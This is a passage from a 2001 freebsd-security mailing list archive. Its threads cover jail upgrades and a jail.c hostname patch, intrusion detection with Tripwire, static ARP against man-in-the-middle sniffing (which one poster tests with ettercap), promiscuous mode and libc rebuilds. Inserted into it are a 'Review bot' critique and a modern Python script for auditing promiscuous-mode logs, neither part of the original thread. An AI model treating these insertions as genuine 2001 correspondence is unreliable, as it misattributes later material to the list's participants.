k> jails as well?

I don't think so... imho, jails run application software basically -- so,
it's okay... nevertheless, nothing could really prevent you from creating
some script upgrading executables with keeping their jail's original modes,
I deem. (Just seeking through specified dirs and comparing EXEs or just
their sizes/mtimes)

k> I have changed a lot of file/dir permissions and so on, and
k> would rather just leave the jail file systems alone. I am just wondering
k> if I don't upgrade the jails, would things start to break?

k> Thanks,
k> K.J.

p.s. I have written a patch to jail.c which allows starting a jail with
symbolic names instead of IP-addr in decimal dotted notation. I do keep
/etc/hosts where symbolic names are being translated, so it's rather
comfortable to setup jails, and firewalls for them.
Here it is: 18a19,25 > #include > #include > #include > #include > #include > #include > 37,38c44,60 < if (!i) < errx(1, "Couldn't make sense of ip-number\n"); --- > if (!i) { > /* check if it is resolveable */ > struct hostent *hp; > hp = gethostbyname(argv[3]); > if (!hp) { > errx(1, "Couldn't make sense of the jail address\n"); > } > else { > char **p = hp->h_addr_list; > if (p[1]) { > errx(1, "Jail should have only one ip-address > associated with\n"); > } > else { > memcpy(&in.s_addr, p[0], sizeof(in.s_addr)); > } > } > }

--
Igor
mailto:poige@morning.ru
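Review bot: The new else branch copies p[0] into in.s_addr with memcpy(&in.s_addr, p[0], sizeof(in.s_addr)) without first checking hp->h_addrtype == AF_INET and hp->h_length == sizeof(in.s_addr); if the resolver ever returns a record of another family, the jail silently binds to the first four bytes of it, so add both checks ahead of the memcpy and errx out otherwise. Also worth stating in the patch: after this change the address a jail binds to is whatever name resolution returns for argv[3], so it is only as trustworthy as the resolver configuration (the message relies on /etc/hosts, but a host whose lookup order consults DNS first would take the answer from DNS). Minor: errx(3) appends the newline itself, so the trailing \n in the three messages is redundant, and the text "Jail should have only one ip-address associated with" reads as cut off.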
From: Nate Williams
Date: Fri, 20 Apr 2001 10:43:13 -0600 (MDT)
To: Cy Schubert - ITSD Open Systems Group
Cc: Raoul Schroeder, Kris Kennaway, fukuda shinichi, freebsd-security@FreeBSD.ORG
Subject: Re: unknown process

> > > Take your system off the net and check it for signs of intrusion.
> > >
> > > Kris
> >
> > Just a quick question: How does one check for signs of intrusion. The FreeBSD
> > handbook does not really talk a lot about this.
> > Is there a good documentation about this?
>
> Install an IDS immediately after installation, then use it. This is
> not a 100% solution but IMO one of the better solutions in your toolkit.

Unfortunately, the most common IDS out there require your machine be
more 'open' than necessary.

(ie; you leave the system open, and it closes them down with firewall
entries, rather than just leaving the non-used ports closed down.)

Nate

From owner-freebsd-security Fri Apr 20 9:57:25 2001
From: "Henk Wevers"
Subject: RE: jail upgrade
Date: Fri, 20 Apr 2001 18:57:16 +0200

I update a jail like this:

make a new jail, let's call it JAIL.

cd JAIL
rm -rf etc/ var/run var/log var/db/locate.database var/db/mouttab
#leave port.mkversion alone!
rm -rf root/ usr/share/

kill the jail you want to update, the jail should not be active while
updating!!

cp -Rp JAIL/* /where/your/jail/is/*

Restart the jail again.

If you are upgrading from FreeBSD 4.1x early and FreeBSD 4.2-? also update
the /etc/pam.conf.

Henk Wevers
Working on http://jailnotes.cg.nu (please give comments)

-----Original Message-----
From: owner-freebsd-security@FreeBSD.ORG [mailto:owner-freebsd-security@FreeBSD.ORG] On Behalf Of Igor Podlesny
Sent: Friday, 20 April 2001 18:05
To: kj
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: jail upgrade

k> Hey, all.
k> I have two jails on my server.
k> When I do a make world on the actual OS, does it matter if I upgrade the
k> jails as well?

I don't think so... imho, jails run application software basically -- so,
it's okay... nevertheless, nothing could really prevent you from creating
some script upgrading executables with keeping their jail's original modes,
I deem. (Just seeking through specified dirs and comparing EXEs or just
their sizes/mtimes)

k> I have changed a lot of file/dir permissions and so on, and
k> would rather just leave the jail file systems alone. I am just wondering
k> if I don't upgrade the jails, would things start to break?

k> Thanks,
k> K.J.

p.s. I have written a patch to jail.c which allows starting a jail with
symbolic names instead of IP-addr in decimal dotted notation. I do keep
/etc/hosts where symbolic names are being translated, so it's rather
comfortable to setup jails, and firewalls for them.
Here it is: 18a19,25 > #include > #include > #include > #include > #include > #include > 37,38c44,60 < if (!i) < errx(1, "Couldn't make sense of ip-number\n"); --- > if (!i) { > /* check if it is resolveable */ > struct hostent *hp; > hp = gethostbyname(argv[3]); > if (!hp) { > errx(1, "Couldn't make sense of the jail address\n"); > } > else { > char **p = hp->h_addr_list; > if (p[1]) { > errx(1, "Jail should have only one ip-address > associated with\n"); > } > else { > memcpy(&in.s_addr, p[0], sizeof(in.s_addr)); > } > } > }

--
Igor
mailto:poige@morning.ru

From owner-freebsd-security Fri Apr 20 10:12:41 2001
Date: Fri, 20 Apr 2001 19:13:14 +0200 (MEST)
From: Pär Thoren
To: freebsd-security@freebsd.org
Subject: static arp values

Hi!

Is it possible to make an arptable entry static? For example the arp address
of my gateway. So that man-in-the-middle attack can be prevented.

I've tried "arp -S ip-address mac-address" but it seems that it is still
possible to infect the arptable with a false mac address of the gateway and
sniff the connection.

/Pär

From owner-freebsd-security Fri Apr 20 10:54:39 2001
Date: Fri, 20 Apr 2001 10:55:27 -0700
From: Brian Tiemann
Organization: Packeteer, Inc.
To: Kris Kennaway
Cc: Rob Simmons, Ben Vaughn, Chris Faulhaber, security@FreeBSD.ORG
Subject: Re: Another glob problem

Okay-- I've solved this problem (for the edification of the rest who are
in my boat) by cvsupping back to RELENG_4_2_0_RELEASE, applying the glob
patch, rebuilding and reinstalling /usr/src/lib/libc and
/usr/src/libexec/ftpd, and then cvsupping back to RELENG_4.

Just a curiosity point, though... would I have been able to do a make
buildworld, then make install only /usr/src/lib/libc? Just trying to see
if that would have been a viable alternative that I could recommend to
others...

Brian

Kris Kennaway wrote:
>
> On Thu, Apr 19, 2001 at 06:37:32PM -0700, Brian Tiemann wrote:
> > I'm just trying to compile /usr/src/lib/libc. I suppose that's not
> > going to work-- a make world will be indicated. Which really sucks for a
> > production server.
> >
> > Yikes. And we were so close to making it to 4.3-RELEASE without an
> > interim build...
>
> That's the trade-off you make when you cvsup -stable. If you have
> lots of machines to update, or (sensibly) want to test it before
> deploying on your production systems, just build world + test on a
> scratch machine, then installworld via NFS on the target servers.
>
> Kris

From owner-freebsd-security Fri Apr 20 10:56: 2 2001
From: "Joseph Gleason"
To: Pär Thoren, freebsd-security@freebsd.org
Subject: Re: static arp values
Date: Fri, 20 Apr 2001 13:55:51 -0400

When you do arp -a, is the static entry you set marked as permanent?

Did you simulate another box taking that IP and look at the arp table
afterward?

Also, you should be aware that some cards allow you to change the MAC
address of the card. (At least I think so...never tried it) So an evil
machine could steal the MAC address and fool the switch into sending it
your traffic. Depending on how advanced your switch is and if it is
manageable, you can hardcode what MAC address is on what port...avoid this
one as well.

----- Original Message -----
From: "Pär Thoren"
Sent: Friday, April 20, 2001 13:13
Subject: static arp values

> Hi!
>
> Is it possible to make an arptable entry static? For example the arp address
> of my gateway. So that man-in-the-middle attack can be prevented.
>
> I've tried "arp -S ip-address mac-address" but it seems that it is still
> possible to infect the arptable with a false mac address of the gateway and
> sniff the connection.
>
> /Pär

From owner-freebsd-security Fri Apr 20 11: 1:30 2001
From: "Antoine Beaupre (LMC)"
To: Peter Pentchev
Cc: freebsd-security@FreeBSD.ORG
Date: Fri, 20 Apr 2001 14:01:18 -0400
Organization: LMC, Ericsson Research Canada
Subject: Re: promiscuous mode

That would fit nicely as a FAQ answer.

A.

Peter Pentchev wrote:
>
> On Thu, Apr 19, 2001 at 08:10:45AM -0500, George.Giles@mcmail.vanderbilt.edu wrote:
> > I have a 4.2-RELEASE box that is going into, and out of, promiscuous mode
> > on the xl0 interface. What would cause this ? Is it a sign of a potential
> > problem ?
>
> 'Promiscuous mode' means that the kernel starts processing - and passing
> to userland programs - ethernet frames that are not targeted to this machine
> only. This means somebody (usu. root ;) is running a packet capture program -
> either tcpdump, or some traffic analysis utility, or - if none of the above -
> possibly a packet sniffer. In the last case, you should be alarmed.
>
> If you are not running tcpdump or some traffic analysis program, or if there
> are times that you are not running those, but the interface still goes into
> or out of promiscuous mode, then yes, this is a sign of a potential intrusion.
>
> G'luck,
> Peter
>
> --
> I am the thought you are now thinking.

--
Semantics is the gravity of abstraction.
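The transitions Peter describes can be audited from syslog rather than noticed by chance. The following is an added example, not code from the thread: it parses the FreeBSD kernel's "promiscuous mode enabled/disabled" messages out of a constructed log excerpt, pairs each enable with its disable per interface, and reports the capture intervals that no known operator-run tcpdump session explains (the log lines and the single known capture window are constructed assumptions).

```python
import re
from datetime import datetime

# Constructed syslog excerpt (not from the thread) in the FreeBSD 4.x format:
# the kernel logs "<ifname>: promiscuous mode enabled|disabled" whenever a
# BPF consumer such as tcpdump, a traffic analyser or a sniffer toggles the flag.
SAMPLE_LOG = """\
Apr 19 03:14:02 fbsd /kernel: xl0: promiscuous mode enabled
Apr 19 03:59:40 fbsd /kernel: xl0: promiscuous mode disabled
Apr 19 08:10:45 fbsd /kernel: xl0: promiscuous mode enabled
Apr 19 08:10:52 fbsd /kernel: xl0: promiscuous mode disabled
Apr 19 12:00:01 fbsd sshd[213]: Accepted publickey for admin from 10.0.0.5
Apr 20 02:30:00 fbsd /kernel: xl0: promiscuous mode enabled
"""

# Assumed: the one window in which an operator is known to have run tcpdump.
# In practice this list comes from a change log or ticket system.
KNOWN_CAPTURE_WINDOWS = [
    (datetime(2001, 4, 19, 8, 0, 0), datetime(2001, 4, 19, 9, 0, 0)),
]

PROMISC_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2}\s+\d\d:\d\d:\d\d)\s+\S+\s+/?kernel:\s+"
    r"(?P<ifname>[a-z]+\d+):\s+promiscuous mode (?P<state>enabled|disabled)$"
)


def parse_events(log_text, year):
    """Return [(timestamp, ifname, state)] for each promiscuous-mode line.

    Syslog timestamps carry no year, so the caller supplies it.
    """
    events = []
    for line in log_text.splitlines():
        m = PROMISC_RE.match(line)
        if m is None:
            continue  # unrelated log line
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append((ts, m["ifname"], m["state"]))
    return events


def capture_intervals(events):
    """Pair each 'enabled' with the next 'disabled' on the same interface.

    Returns [(ifname, start, end)]; an interface still promiscuous at the end
    of the log gets end=None, which is the case that most deserves attention.
    """
    open_since = {}
    intervals = []
    for ts, ifname, state in events:
        if state == "enabled":
            open_since.setdefault(ifname, ts)  # nested enables keep the first
        elif ifname in open_since:
            intervals.append((ifname, open_since.pop(ifname), ts))
    for ifname, start in open_since.items():
        intervals.append((ifname, start, None))
    return intervals


def unexplained_intervals(intervals, known_windows):
    """Keep the intervals whose start lies outside every known capture window."""
    def explained(ts):
        return any(start <= ts <= end for start, end in known_windows)

    return [iv for iv in intervals if not explained(iv[1])]


def report(log_text, year, known_windows):
    """One human-readable line per unexplained promiscuous-mode interval."""
    lines = []
    intervals = capture_intervals(parse_events(log_text, year))
    for ifname, start, end in unexplained_intervals(intervals, known_windows):
        if end is None:
            lines.append(f"{ifname}: promiscuous since {start:%b %d %H:%M:%S}, still enabled")
        else:
            secs = int((end - start).total_seconds())
            lines.append(f"{ifname}: promiscuous {start:%b %d %H:%M:%S} to "
                         f"{end:%H:%M:%S} ({secs}s), no known capture")
    return lines


if __name__ == "__main__":
    for line in report(SAMPLE_LOG, 2001, KNOWN_CAPTURE_WINDOWS):
        print(line)
```

On the sample data the 08:10 capture falls inside the known window, while the 45-minute night-time interval and the still-open enable on Apr 20 are reported.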
From owner-freebsd-security Fri Apr 20 11:14:27 2001
To: nate@yogotech.com (Nate Williams)
Cc: Cy Schubert - ITSD Open Systems Group, Raoul Schroeder, Kris Kennaway, fukuda shinichi, freebsd-security@FreeBSD.ORG
Subject: Re: unknown process
Date: Fri, 20 Apr 2001 11:13:21 -0700
From: Cy Schubert

In message <15072.26401.630643.257226@nomad.yogotech.com>, Nate Williams writes:
> > > > Take your system off the net and check it for signs of intrusion.
> > > >
> > > > Kris
> > >
> > > Just a quick question: How does one check for signs of intrusion. The FreeBSD
> > > handbook does not really talk a lot about this.
> > > Is there a good documentation about this?
> >
> > Install an IDS immediately after installation, then use it. This is
> > not a 100% solution but IMO one of the better solutions in your toolkit.
>
> Unfortunately, the most common IDS out there require your machine be
> more 'open' than necessary.
>
> (ie; you leave the system open, and it closes them down with firewall
> entries, rather than just leaving the non-used ports closed down.)

Actually, the IDS I had in mind was Tripwire.

Regards,

Cy Schubert
Team Leader, Sun/Alpha Team
Open Systems Group, ITSD, ISTA
Province of BC
Phone: (250)387-8437  Fax: (250)387-5766
Internet: Cy.Schubert@osg.gov.bc.ca

From owner-freebsd-security Fri Apr 20 12:41:12 2001
Date: Fri, 20 Apr 2001 12:41:04 -0700
From: Kris Kennaway To: Brian Tiemann Cc: Kris Kennaway , Rob Simmons , Ben Vaughn , Chris Faulhaber , security@FreeBSD.ORG Subject: Re: Another glob problem Message-ID: <20010420124104.A75540@xor.obsecurity.org> References: <20010419164947.M72854-100000@mail.wlcg.com> <3ADF7BDD.A7868DA@packeteer.com> <20010419180118.C54774@xor.obsecurity.org> <3ADF8C73.7E987982@packeteer.com> <20010419181459.B57373@xor.obsecurity.org> <3ADF8EFB.1B6EBA04@packeteer.com> <20010419183125.A57696@xor.obsecurity.org> <3ADF92DC.2B5A941D@packeteer.com> <20010419194710.A58378@xor.obsecurity.org> <3AE0780F.BAF16352@packeteer.com> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="Qxx1br4bt0+wmkIi" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <3AE0780F.BAF16352@packeteer.com>; from briant@packeteer.com on Fri, Apr 20, 2001 at 10:55:27AM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

--Qxx1br4bt0+wmkIi
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline

On Fri, Apr 20, 2001 at 10:55:27AM -0700, Brian Tiemann wrote:
> Okay-- I've solved this problem (for the edification of the rest who
> are in my boat) by cvsupping back to RELENG_4_2_0_RELEASE, applying the
> glob patch, rebuilding and reinstalling /usr/src/lib/libc and
> /usr/src/libexec/ftpd, and then cvsupping back to RELENG_4.

You now have a libc which was built from different sources from the rest of your userland. It may all work, but there's no guarantee; for example if a userland utility depends on a libc interface which was only added after 4.2-R, it will now fail. This is why I suggested that a buildworld is the only safe way of rebuilding, if you're tracking -STABLE.

> Just a curiosity point, though... would I have been able to do a make
> buildworld, then make install only /usr/src/lib/libc? Just trying to see
> if that would have been a viable alternative that I could recommend to
> others...
No, because your entire libc has changed (not just the glob() function), and other things may depend on it. You can only get away with doing partial installs if the relevant changes to the file are small, and you manually take into account all possible dependencies.

Kris

--Qxx1br4bt0+wmkIi
Content-Type: application/pgp-signature
Content-Disposition: inline

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (FreeBSD)
Comment: For info see http://www.gnupg.org

iD8DBQE64JDQWry0BWjoQKURAn30AJ4i36TlgGqhyCdnckdzr45+wegjtQCfZWBY
gXwP9w86bR+2gxZ4xftwlPk=
=mzd2
-----END PGP SIGNATURE-----

--Qxx1br4bt0+wmkIi--

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Fri Apr 20 13: 1: 5 2001 Delivered-To: freebsd-security@freebsd.org Received: from urdvg001.cms.usa.net (urdvg001.cms.usa.net [165.212.11.1]) by hub.freebsd.org (Postfix) with SMTP id D018C37B424 for ; Fri, 20 Apr 2001 13:01:01 -0700 (PDT) (envelope-from briant@packeteer.com) Received: (qmail 10937 invoked from network); 20 Apr 2001 20:01:01 -0000 Received: from uadvg128.cms.usa.net (165.212.11.128) by corprelay.cms.usa.net with SMTP; 20 Apr 2001 20:01:01 -0000 Received: (qmail 2741 invoked by uid 0); 20 Apr 2001 20:01:00 -0000 Received: USA.NET MXFirewall, messaging filters applied; Fri, 20 Apr 2001 20:01:00 GMT Received: from packeteer.com [207.78.98.2] by uadvg128 (ASMTP/briant@postoffice.packeteer.com) via mtad (53CM.0401.1.03) with ESMTP id 709FDTua80318M16; Fri, 20 Apr 2001 20:00:59 GMT Message-ID: <3AE095B3.B4A018EB@packeteer.com> Date: Fri, 20 Apr 2001 13:01:55 -0700
From: Brian Tiemann Organization: Packeteer, Inc. X-Mailer: Mozilla 4.74 [en] (Win98; U) X-Accept-Language: en MIME-Version: 1.0 To: Kris Kennaway Cc: Rob Simmons , Ben Vaughn , Chris Faulhaber , security@FreeBSD.ORG Subject: Re: Another glob problem References: <20010419164947.M72854-100000@mail.wlcg.com> <3ADF7BDD.A7868DA@packeteer.com> <20010419180118.C54774@xor.obsecurity.org> <3ADF8C73.7E987982@packeteer.com> <20010419181459.B57373@xor.obsecurity.org> <3ADF8EFB.1B6EBA04@packeteer.com> <20010419183125.A57696@xor.obsecurity.org> <3ADF92DC.2B5A941D@packeteer.com> <20010419194710.A58378@xor.obsecurity.org> <3AE0780F.BAF16352@packeteer.com> <20010420124104.A75540@xor.obsecurity.org> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

Kris Kennaway wrote:
> You now have a libc which was built from different sources from the
> rest of your userland. It may all work, but there's no guarantee; for
> example if a userland utility depends on a libc interface which was
> only added after 4.2-R, it will now fail. This is why I suggested
> that a buildworld is the only safe way of rebuilding, if you're
> tracking -STABLE.

Actually, no... the rest of my userland is also from 4.2-RELEASE, which is why I decided to try this solution. The way I run my systems is by maintaining a full -RELEASE install, then tracking -STABLE with nightly cvsups so I can do point installs on contrib or userland software when there are security patches. I don't do interim make worlds on production servers-- that's way too risky, IMO, and not least because of the reason you just outlined (the only way to recover on an interim system is to do another make world).
In this case, though, we had a core-level system patch (in libc), so it seemed the best way to attack it would be to go back and patch the -RELEASE sources, since the only things that have changed in my installed system since 4.2-RELEASE are security related point fixes (ntpd, bind, sshd, that sort of thing). I think it's a sound scheme. (It's effectively the same as if I didn't do cvsups at all, and just applied security patches to -RELEASE sources.)

> > Just a curiosity point, though... would I have been able to do a make
> > buildworld, then make install only /usr/src/lib/libc? Just trying to see
> > if that would have been a viable alternative that I could recommend to
> > others...
>
> No, because your entire libc has changed (not just the glob()
> function), and other things may depend on it. You can only get away
> with doing partial installs if the relevant changes to the file are
> small, and you manually take into account all possible dependencies.

Yeah... it'll probably work the way I run things, but I'll refrain from recommending this solution to others in case they try it on a system that doesn't have all its ducks in a row (or has been interim-rebuilt).

Brian

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Fri Apr 20 13: 7:13 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-63-207-60-27.dsl.lsan03.pacbell.net [63.207.60.27]) by hub.freebsd.org (Postfix) with ESMTP id 1F43037B422 for ; Fri, 20 Apr 2001 13:07:11 -0700 (PDT) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id 17C1266B1C; Fri, 20 Apr 2001 13:07:06 -0700 (PDT) Date: Fri, 20 Apr 2001 13:07:06 -0700
From: Kris Kennaway To: Brian Tiemann Cc: security@FreeBSD.ORG Subject: Re: Another glob problem Message-ID: <20010420130706.A86071@xor.obsecurity.org> References: <20010419180118.C54774@xor.obsecurity.org> <3ADF8C73.7E987982@packeteer.com> <20010419181459.B57373@xor.obsecurity.org> <3ADF8EFB.1B6EBA04@packeteer.com> <20010419183125.A57696@xor.obsecurity.org> <3ADF92DC.2B5A941D@packeteer.com> <20010419194710.A58378@xor.obsecurity.org> <3AE0780F.BAF16352@packeteer.com> <20010420124104.A75540@xor.obsecurity.org> <3AE095B3.B4A018EB@packeteer.com> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="opJtzjQTFsWo+cga" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <3AE095B3.B4A018EB@packeteer.com>; from briant@packeteer.com on Fri, Apr 20, 2001 at 01:01:55PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

--opJtzjQTFsWo+cga
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline

On Fri, Apr 20, 2001 at 01:01:55PM -0700, Brian Tiemann wrote:
> (It's effectively the same as if I didn't do cvsups at all, and just
> applied security patches to -RELEASE sources.)

Oh, okay -- yes, sounds fine.
Kris

--opJtzjQTFsWo+cga
Content-Type: application/pgp-signature
Content-Disposition: inline

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (FreeBSD)
Comment: For info see http://www.gnupg.org

iD8DBQE64JbqWry0BWjoQKURAgRUAJwLV0Maz0IGjc9GREhXBiS8SGuzpQCgoAnY
wzaLGTJZWmiqig0NYge8+fc=
=1Fml
-----END PGP SIGNATURE-----

--opJtzjQTFsWo+cga--

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Fri Apr 20 13:12: 4 2001 Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id 6CA4637B42C for ; Fri, 20 Apr 2001 13:12:00 -0700 (PDT) (envelope-from Cy.Schubert@uumail.gov.bc.ca) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id NAA17932; Fri, 20 Apr 2001 13:11:26 -0700 Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda17930; Fri Apr 20 13:11:16 2001 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.11.2/8.9.1) id f3KKBBD06669; Fri, 20 Apr 2001 13:11:11 -0700 (PDT) Received: from cwsys9.cwsent.com(10.2.2.1), claiming to be "cwsys.cwsent.com" via SMTP by passer9.cwsent.com, id smtpdnz6663; Fri Apr 20 13:10:26 2001 Received: (from uucp@localhost) by cwsys.cwsent.com (8.11.3/8.9.1) id f3KKAQL13623; Fri, 20 Apr 2001 13:10:26 -0700 (PDT) Message-Id: <200104202010.f3KKAQL13623@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdt13592; Fri Apr 20 13:10:08 2001 X-Mailer: exmh version 2.3.1 01/18/2001 with nmh-1.0.4 Reply-To: Cy Schubert - ITSD Open Systems Group
From: Cy Schubert - ITSD Open Systems Group X-Sender: schubert To: Ragnar Beer Cc: freebsd-security@FreeBSD.ORG Subject: Re: Tripwire or the like for FreeBSD ? In-reply-to: Your message of "Fri, 20 Apr 2001 10:34:21 +0200." Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Fri, 20 Apr 2001 13:10:08 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

In message , Ragnar Beer writes:
> Has anybody looked at http://sourceforge.net/projects/tripwire/ ?
> There's a GPL'd version (2.3.1-2) of Tripwire. I got the impression
> that over mtree Tripwire has the advantage of a more fine-grained
> control.

I'm currently whittling away on the upcoming Tripwire 2.3.1-2 port. The new port compiles and installs ok. The only thing left to complete is the creation of a default FreeBSD policy file, which in my estimation is about 20% complete.

Regards,                       Phone:  (250)387-8437
Cy Schubert                    Fax:    (250)387-5766
Team Leader, Sun/Alpha Team    Internet:  Cy.Schubert@osg.gov.bc.ca
Open Systems Group, ITSD, ISTA
Province of BC

>
> Ragnar
>
> >Hopefully I am not being too dense, but what about the Tripwire-1.2 in the
> >security ports?
> >
> >SM
> >
> >
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Fri Apr 20 13:37:54 2001 Delivered-To: freebsd-security@freebsd.org Received: from obelix.rby.hk-r.se (obelix-b.student.bth.se [194.47.132.4]) by hub.freebsd.org (Postfix) with ESMTP id A868437B422 for ; Fri, 20 Apr 2001 13:37:49 -0700 (PDT) (envelope-from t98pth@student.bth.se) Received: from helios.kna.hk-r.se (helios [194.47.153.5]) by obelix.rby.hk-r.se (8.10.2/8.10.2) with ESMTP id f3KKblM02042; Fri, 20 Apr 2001 22:37:47 +0200 (MEST) Received: from localhost (t98pth@localhost) by helios.kna.hk-r.se (8.9.3+Sun/8.9.3) with ESMTP id WAA27500; Fri, 20 Apr 2001 22:38:24 +0200 (MEST) X-Authentication-Warning: helios.kna.hk-r.se: t98pth owned process doing -bs Date: Fri, 20 Apr 2001 22:38:23 +0200 (MEST)
From: =?ISO-8859-1?Q?P=E4r_Thoren?= X-Sender: t98pth@helios To: Joseph Gleason Cc: freebsd-security@freebsd.org Subject: Re: static arp values In-Reply-To: <007b01c0c9c3$238fb480$dc02010a@battleship> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=ISO-8859-1 Content-Transfer-Encoding: QUOTED-PRINTABLE Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

On Fri, 20 Apr 2001, Joseph Gleason wrote:

> When you do arp -a, is the static entry you set marked as permanent?

Yes it is.

>
> Did you simulate another box taking that IP and look at the arp table
> afterward?
>

Yes I did. And the arp is in fact what it is supposed to be, so it appears static (when I did the same thing on w2k, arp -s, the MAC address changed). But I can still sniff the connection between the machine with the static arp value and the router. That is what I find strange. I simulate the man-in-the-middle attack with ettercap by the way.

> Also, you should be aware that some cards allow you to change the MAC
> address of the card. (At least I think so...never tried it) So an evil
> machine could steal the MAC address and fool the switch into sending it your
> traffic.
>
> Depending on how advanced your switch is and if it is manageable, you can
> hardcode what MAC address is on what port...avoid this one as well.
>
> ----- Original Message -----
> From: "Pär Thoren"
> To:
> Sent: Friday, April 20, 2001 13:13
> Subject: static arp values
>
>
> > Hi!
> >
> >
> > Is it possible to make an arp table entry static? For example the arp address
> > of my gateway. So that man-in-the-middle attack can be prevented.
> >
> >
> > I've tried "arp -S ip-adres mac-adres" but it seems that it is still
> > possible to infect the arp table with a false MAC address of the gateway and
> > sniff the connection.
> >
> >
> > /Pär
> >
> >
> >
> > To Unsubscribe: send mail to majordomo@FreeBSD.org
> > with "unsubscribe freebsd-security" in the body of the message
> >
>
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message
>

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Fri Apr 20 14:17:23 2001 Delivered-To: freebsd-security@freebsd.org Received: from obelix.rby.hk-r.se (obelix-140.rby.hk-r.se [194.47.140.4]) by hub.freebsd.org (Postfix) with ESMTP id 948E437B43E for ; Fri, 20 Apr 2001 14:17:19 -0700 (PDT) (envelope-from t98pth@student.bth.se) Received: from helios.kna.hk-r.se (helios [194.47.153.5]) by obelix.rby.hk-r.se (8.10.2/8.10.2) with ESMTP id f3KLHIM10330 for ; Fri, 20 Apr 2001 23:17:18 +0200 (MEST) Received: from localhost (t98pth@localhost) by helios.kna.hk-r.se (8.9.3+Sun/8.9.3) with ESMTP id XAA27510 for ; Fri, 20 Apr 2001 23:17:55 +0200 (MEST) X-Authentication-Warning: helios.kna.hk-r.se: t98pth owned process doing -bs Date: Fri, 20 Apr 2001 23:17:55 +0200 (MEST)
From: =?ISO-8859-1?Q?P=E4r_Thoren?= X-Sender: t98pth@helios To: freebsd-security@freebsd.org Subject: rpc.statd attack Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=ISO-8859-1 Content-Transfer-Encoding: QUOTED-PRINTABLE Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

Ok when I get portscanned...but these guys try to exploit my ass.

